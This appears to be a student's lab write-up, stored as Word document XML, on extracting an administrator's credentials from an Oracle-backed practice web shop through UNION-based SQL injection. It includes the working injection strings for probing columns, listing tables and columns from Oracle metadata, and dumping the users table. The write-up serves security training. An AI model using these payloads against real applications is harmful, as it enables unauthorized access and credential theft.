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9E4A1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Lab 06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67077B80">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> Listing Database Contents on Oracle via UNION Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF69379">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30382C9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31746561">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520106BF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>## How I Detected It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13902FFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="241571F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Same entry point — category filter in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2197E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A84216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/filter?category=Gifts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7673EC94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5424275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Single quote test errored out. Column count confirmed with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F961D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A3D91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'+UNION+SELECT+'abc','def'+FROM+dual--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442DA76F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC4B90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`FROM dual` required as always on Oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A1F13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6496FEE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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66244C85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0684B175">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>## The Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B50EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CC9FB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Same goal as Lab 05 — find the credentials table, dump it, log in as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C891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administrator. The difference is the database is Oracle, which has its</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D01272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own metadata tables instead of `information_schema`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D952FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0BDEE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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3EE452">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A309F7B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>## What I Did</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD636F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B0506F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>### Step 1 — List all tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3B7E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3293ED6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'+UNION+SELECT+table_name,NULL+FROM+all_tables--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD288F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376BF39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Oracle doesn't have `information_schema`. Instead it uses `all_tables`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C593E1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to list every table the current user has access to. Spotted a table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C47B6C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named something like `USERS_ABCDEF` in the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F2C4D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F665A08">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>### Step 2 — List columns in that table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC8E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1C471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'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AFBE5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6905B97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Oracle's equivalent of `information_schema.columns` is `all_tab_columns`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929885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Table names on Oracle are uppercase by default — `USERS_ABCDEF` not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CD1BB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`users_abcdef`. Got back two columns: `USERNAME_ABCDEF` and `PASSWORD_ABCDEF`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2682B4DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CC8A737">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>### Step 3 — Dump the credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AAE99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D157A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'+UNION+SELECT+USERNAME_ABCDEF,PASSWORD_ABCDEF+FROM+USERS_ABCDEF--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBBB8B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FA97C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Both columns showed up in the response with the administrator's plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933DED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password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D411A24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50931929">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>### Step 4 — Log in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26902244">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F6ED6B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Used `administrator` and the dumped password on the login page. Lab solved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55186A9D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234C57A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---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0B977">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E8D7E9A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>## What I Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D05D0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FDCDF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attack chain is identical to Lab 05 — the only thing that changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3822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is the metadata tables Oracle uses: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3180"/>
        <w:gridCol w:w="1875"/>
      </w:tblGrid>
      <w:tr w14:paraId="3AE8B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5411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Thing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EFE70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Non-Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="369C4B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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="54A2F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43F7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List tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26DA3C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information_schema.tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F0681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all_tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3A600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AFAB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List columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="547E63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information_schema.columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77B309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all_tab_columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="489E3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6BAA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Dummy table needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="473462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4EDBF0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FROM dual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7E6AA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484A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Table name case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CA0DF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lowercase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CBBC5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UPPERCASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7298BE15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37133C7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="46D244F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B3506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uppercase thing is easy to miss — if your WHERE clause has the wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC55D9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case the query returns nothing and you think the table doesn't exist.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C72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2026-06-01T08:51:41Z</dcterms:created>
  <dc:creator>Aswin Krishna</dc:creator>
  <cp:lastModifiedBy>Aswin Krishna S.G</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-01T08:58:52Z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eyJoZGlkIjoiNWZlNzU5YzcwNTcwYzRhZjI3N2E2MGM4ZmJjMGMzODUiLCJ1c2VySWQiOiI1Njc2NTM3NTU1OTcifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>029BA6160A544CD4A0F46C4921B589EE_12</vt:lpwstr>
  </property>
</Properties>
</file>